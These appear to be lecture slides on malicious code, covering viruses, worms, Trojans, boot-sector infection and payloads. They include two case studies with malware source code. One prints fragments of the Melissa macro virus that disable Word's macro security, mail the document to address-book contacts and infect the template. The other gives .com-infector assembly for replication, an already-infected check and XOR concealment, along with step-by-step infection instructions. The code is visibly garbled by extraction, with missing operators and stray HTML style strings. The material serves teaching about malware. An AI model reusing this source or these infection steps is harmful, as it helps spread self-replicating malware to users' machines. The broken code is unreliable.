Viruses, Trojan Horses, and Worms

1
Viruses, Trojan Horses, and Worms
2

• Propagation of malicious code
• Malicious indicates the potential to do damage.
• Usually classified by the type of propagation.
• Sometimes classified by
• Platforms and mechanisms it requires to run
• E.g. macro viruses.
• Virus/Trojan/worm may not actually cause damages.

3
Viruses

• Program or piece of code that will reproduce
  itself.
• Sometimes perform a particular action.
• Definition from RFC 1135
• A virus is a piece of code that inserts itself
  into a host, including operating systems, to
  propagate. It cannot run independently. It
  requires that its host program be run to activate
  it.

4
Worm

• A worm is similar to a virus, but it does not
  locally reproduce.
• Propagates between systems only.
• Definition from RFC 1135
• A worm is a program that can run independently,
  will consume the resources of its host from
  within in order to maintain itself and can
  propagate a complete working version of itself on
  to other machines.

5
Macro Virus

• Sometimes considered worms.
• Require a host program to process/run it in order
  for it to execute.
• Often written in VBA (Visual Basic for
  Application) for Word, Access, Excel, PowerPoint,
  and outlook etc.
• E.g. Melissa

6
Trojan Horses

• Code disguised as benign programs, but behave in
  an unexpected, usually malicious manner.
• User needs to be convinced to accept/run them.
• E.g. Pokemon worm, which will display animated
  pictures of bouncing Pikachu on your screen while
  it e-mails itself to everyone in your address
  book and prepares to delete every files.

7
The Trojan horses initially appears as an e-mail
with the title "Pikachu Pokemon" and the English
message "Pikachu is your friend.
The above picture is what the users see when
executing pokemon.exe (its attachment). What
they dont see is the application e-mailing
itself and deleting files from the system.
8
Anatomy of a Virus

• Two primary components
• Propagation mechanism
• Payload
• Propagation
• Method by which the virus spreads itself.
• Old days single PC, transferred to other hosts
  by ways of floppy diskettes.
• Nowadays internet.

9

• Types of Propagation
• Parasitic
• Propagates by being a parasite on other files.
• Attaching itself in some manner that still
  leaves the original file usable.
• .com and .exe files of MS-DOS
• Macro virus
• Boot sector infectors
• Copy themselves to the bootable portion of the
  hard (or floppy) disk.
• The virus gain control when the system is booted.

10

• Normal boot procedure
• It first goes through its usual POST
• Power On Self Test
• BIOS (Basic Input/Output System) does what is
  referred to a as bootstrap
• Checking for a valid bootable disk
• For a hard drive to be bootable, it must contain
  a Master Boot Record (MBR).
• Chuck of code that lies at the beginning of the
  hard drive.
• Understand the partition table.

11

• The MBR code will look for a particular partition
  that is marked bootable (MSDOS fdisk active),
  and then transfer control to the code.
• This code is known as the boot sector.
• Viruses have two opportunities to take control.
• Insert themselves into the MBR position
• They can gain control under all situations
• At the expense of having to deal with reading and
  booting via the partition table.

12

• Insert themselves into the boot sector of a
  partition
• Boot sector viruses tend to take the existing MBR
  or boot sector code, relocate it elsewhere, and
  then insert themselves into the record.
• When the system boots, they can do their things,
  and then transfer control to the relocated code
  that they replaced.

13

• Multi-partite
• Refers to viruses that can use multiple means of
  infection, such as
• MBR
• Boot sector
• Parasitic

14
Payload

• Refers to what the virus does (besides
  propagation) once executed.
• Do nothing
• Do cute things
• Malicious damage such as delete your partition
  table.
• Some viruses have a particular trigger.
• Date
• Number of successful infections

15

• Smart viruses usually use infrequent trigger so
  that they have ample time to ensure they have
  properly propagated, before alerting the users.

16
Case Study I Melissa

• Melissa works by infecting the Document_Open()
  macro of Microsoft word.
• Run immediately when the user opens the word
  files.

Private Sub document_open() On Error Resume Next
17

• Disable the macro security features

If System.PrivateProfileString("",
"HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\
Word\Security", "Level") "" Then
CommandBars("Macro").Controls("Security...").Enabl
ed False System.PrivateProfileString("",
"HKEY_CURRENT_USER \Software\Microsoft\Office\9
.0\Word\Security", "Level") 1 Else p
"clone" CommandBars("Tools").Controls("Macro")
.Enabled False Options.ConfirmConversions
(1 - 1) Options.VirusProtection (1 - 1)
Options.SaveNormalPrompt (1 - 1) End If
18

• MAPI stands for Messaging API, a way for
  Windows applications to interface with various
  e-mail functionalities.
• A way to tell if it has already infected the
  host.

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook CreateObject("Outlook.Applic
ation") Set DasMapiName UngaDasOutlook.GetNameS
pace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\ Software\Microsoft\Office\",
"
Melissa?") "... by Kwyjibo" Then
19

• To see if the application is outlook
• Compose of a list of the first 50 email addresses
  from the address book

If UngaDasOutlook "Outlook" Then
DasMapiName.Logon "profile", "password" For
y 1 To DasMapiName.AddressLists.Count
Set AddyBook DasMapiName.AddressLists(y)
x 1 Set BreakUmOffASlice
UngaDasOutlook.CreateItem(0) For oo 1
To AddyBook.AddressEntries.Count
Peep AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x x 1 If x 50 Then oo
AddyBook.AddressEntries.Count Next oo
20

• Actually send emails
• Wrap up

BreakUmOffASlice.Subject "Important Message
From " Application.UserName BreakUmOffASlice.Bo
dy "Here is that document you asked for ...
don't
show anyone else -)" BreakUmOffASlice.Attachment
s.Add ActiveDocument.FullName BreakUmOffASlice.Se
nd
Peep "" Next y DasMapiName.Logoff End If p
"clone" System.PrivateProfileString("",
"HKEY_CURRENT_USER \Software\Microsoft\Office\",
"6"Melissa?") "... by Kwyjibo" End If
21

• Check to see if the active document and document
  template are infected.
• Infect it.

22
Set ADI1 ActiveDocument.VBProject.VBComponents.I
tem(1) Set NTI1 NormalTemplate.VBProject.VBComp
onents.Item(1) NTCL NTI1.CodeModule.CountOfLine
s ADCL ADI1.CodeModule.CountOfLines BGN 2
If ADI1.Name "-colorffff66"Melissa" Then If ADCL 0
Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set
ToInfect ADI1 ADI1.Name "style"colorblackbackground-colorffff66"Melis
sa" DoAD True End If If NTI1.Name "style"colorblackbackground-colorffff66"Melis
sa" Then If NTCL 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL Set
ToInfect NTI1 NTI1.Name "style"colorblackbackground-colorffff66"Melis
sa" DoNT True End If If DoNT True And
DoAD True Then GoTo CYA
23

• Modifying the Document_Open() and
  Document_Close() function of the active document.
• Every new document created, upon closing or
  saving will run the Melissa worm.
• Saving the current document.

24
Case Study .com Virus

• A .com virus may be divided into three parts.
• Replicator
• Concealer
• Bomb (payload)

25

• Replicator
• Spread the virus.
• Copy rest of the code at the end.

P1
P2
V1
V2
The uninfected file
The virus code
P1
P2
P1
26

• Copy small portion of its code to the beginning
  of the file.
• Copy the second part of itself to the end of the
  file.
• What do V1 and V2 do?
• V1 transfers control of the program to V2.

V1
P1
V2
P2
27

• The code to do this is simple
• The value of Duh must be changed to reflect the
  length of the file that is infected.
• Dup length of V1 original size of the inflect
  file
• 256 (to account for the start position).
• E.g. if file size 79 and V16
• Dup 679256 341.
• Another approach

JMP FAR PTR Duh Takes four bytes Duh
DW V2_Start Takes two bytes
DB 1101001b Code for JMP
(2 byte-displacement) Duh DW
V2_Start - OFFSET Duh 2 byte displacement
28

• V2 contains the rest of the code.
• The last part of V2 copies P1 over V1 (in memory)
  and then transfers the control to the beginning
  of the file (in memory).

MOV SI, V2_START V2_START is a LABEL
marking where V2
starts SUB SI, V1_LENGTH Go back to
where P1 is stored MOV DI, 0100h
All COM files are loaded _at_
CS100h in memory MOV CX, V1_LENGTH
Move CX bytes REP MOVSB
DSSI - ESDI MOV DI, 0100h JMP
DI
29

• The code assume that P1 is located just before
  V2.
• It also assumes ES equals to CS. If these
  assumptions are false, we can change it
  accordingly.

PUSH CS Store CS POP ES
and move it to ES
Note MOV ES, CS is not a
valid instruction MOV SI,
P1_START Move from wherever P1 is stored
MOV DI, 0100h to CS100h MOV
CX, V1_LENGTH REP MOVSB MOV DI, 0100h
JMP DI
30

• The code first moves CS into ES.
• Then sets the source pointer of MOVSB to where P1
  is located.
• Note that the offset of P1 is 100h higher than
  the physical file location, as COM files are
  loaded starting from CS100h.
• Infecting .EXE file is much more complicated.

31

• Replicator portion
• Steps
• Find a file to infect.
• Check if it is already infected.
• If so, go back to 1
• Infect it.
• If infected enough, quit
• Otherwise, go back to 1
• Finding a file to infect
• Write a directory traversal procedure
• Issuing FINDFIRST and FINDNEXT calls

32

• Once you find the file, open it and read the
  first few bytes. If they are the same as the
  first few bytes of V1, then the file is already
  infected.
• Infection should take the following steps
• Change the file attributes to nothing.
• Save the file date/time stamps.
• Close the file.
• Open it again in read/write mode.
• Save P1 and append it to the end of the file.
• Copy V1 to the beginning, but change the offset
  which it JMPs to so it transfers control
  correctly.
• Append V2 to the end of the file.
• Restore file attributes /date/time.

33
mov ah,3Fh Read
first three mov cx, 3
bytes of the file lea
dx, bpoffset buffer to the buffer
int 21h mov ax,
4202h SEEK from EOF
xor cx, cx
DXCX offset xor dx, dx
Returns filesize int
21h in DXAX
sub ax, virus_size 3 cmp
word ptr bpoffset buffer1, ax
jnz infect_it bomb_out mov
ah, 3Eh else close the
file int 21h
and go find another
Sample code to Check if the file has been
infected.
34

• Concealer
• Conceals the program from notice by the everyday
  user and virus scanner.
• A simple XOR encryption

encrypt_val db ? decrypt encrypt mov
ah, encrypt_val mov cx, part_to_encrypt_end
- part_to_encrypt_start mov si,
part_to_encrypt_start mov di, si xor_loop
lodsb DSSI - AL
xor al, ah stosb AL -
ESDI loop xor_loop ret
35

• Bomb
• Does all nasty things to annoy the user.
• Some possible bombs
• System slowdown
• Easily handled by trapping an interrupt and
  causing a delay when it activates.
• File deletion.
• Message Display.
• Killing/Replacing the partition table or boot
  sector of the hard drive.

36
Anti-virus Techniques

• Integrity/behavioral Checkers
• Use good OS
• Use virus scanner on computer and email-server.
• Use virus scanner
• Do not open attachments to emails.
• Frequent backups.

37
Reference

• Kevin L. Poulsen, "Hack Proofing Your Network
  Internet Tradecraft", Chapter 14, p.383 405
• Dark Angels Phunky Virus Writing Guide
  http//www.sirkussystem.com/virus.html
• Introduction
• Installment II the replicator